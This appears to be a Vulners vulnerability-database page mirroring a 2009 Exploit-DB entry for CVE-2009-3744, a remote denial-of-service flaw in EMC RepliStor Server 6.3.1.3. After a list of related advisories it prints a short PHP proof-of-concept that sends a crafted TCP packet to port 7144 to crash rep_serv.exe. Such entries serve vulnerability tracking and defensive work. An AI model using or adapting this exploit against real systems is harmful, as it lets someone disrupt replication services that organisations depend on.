Lucene search
+L

EMC RepliStor Server 6.3.1.3 - Denial of Service

🗓️ 20 Oct 2009 00:00:00Reported by bellickType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

EMC RepliStor Server 6.3.1.3 remote denial of servic

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-3744
20 Oct 200900:00
circl
checkpoint_advisories
Check Point Advisories
Update Protection against EMC RepliStor rep_srv and ctrlservice Denial of Service
23 Dec 200900:00
checkpoint_advisories
checkpoint_advisories
Check Point Advisories
EMC RepliStor rep_srv and ctrlservice Denial of Service (CVE-2009-3744)
31 Jan 201000:00
checkpoint_advisories
cve
CVE
CVE-2009-3744
22 Oct 200915:26
cve
cvelist
Cvelist
CVE-2009-3744
22 Oct 200915:26
cvelist
nessus
Tenable Nessus
EMC RepliStor rep_srv.exe Crafted TCP Packet Remote DoS (ESA-09-019)
29 Mar 201000:00
nessus
euvd
EUVD
EUVD-2009-3716
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-3744
22 Oct 200916:00
nvd
prion
Prion
Code injection
22 Oct 200916:00
prion
<?php
    /*
    EMC RepliStor Server (rep_serv.exe) 6.3.1.3 remote denial of
    service poc
    by Nine:Situations:Group::bellick

    */

    $host = "192.168.0.1";
    $port = 7144;

    $_sock = fsockopen($host, $port, $errno, $errstr, 2);
    if (!$fp) {
        echo "$errstr ($errno)\n";
    } else {
        $_p = "\x54\x93\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41";
        fputs($_sock, $_p);
        fclose($_sock);
    }
?>

original url: http://retrogod.altervista.org/9sg_emc_repli_crash.html

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Oct 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07271
40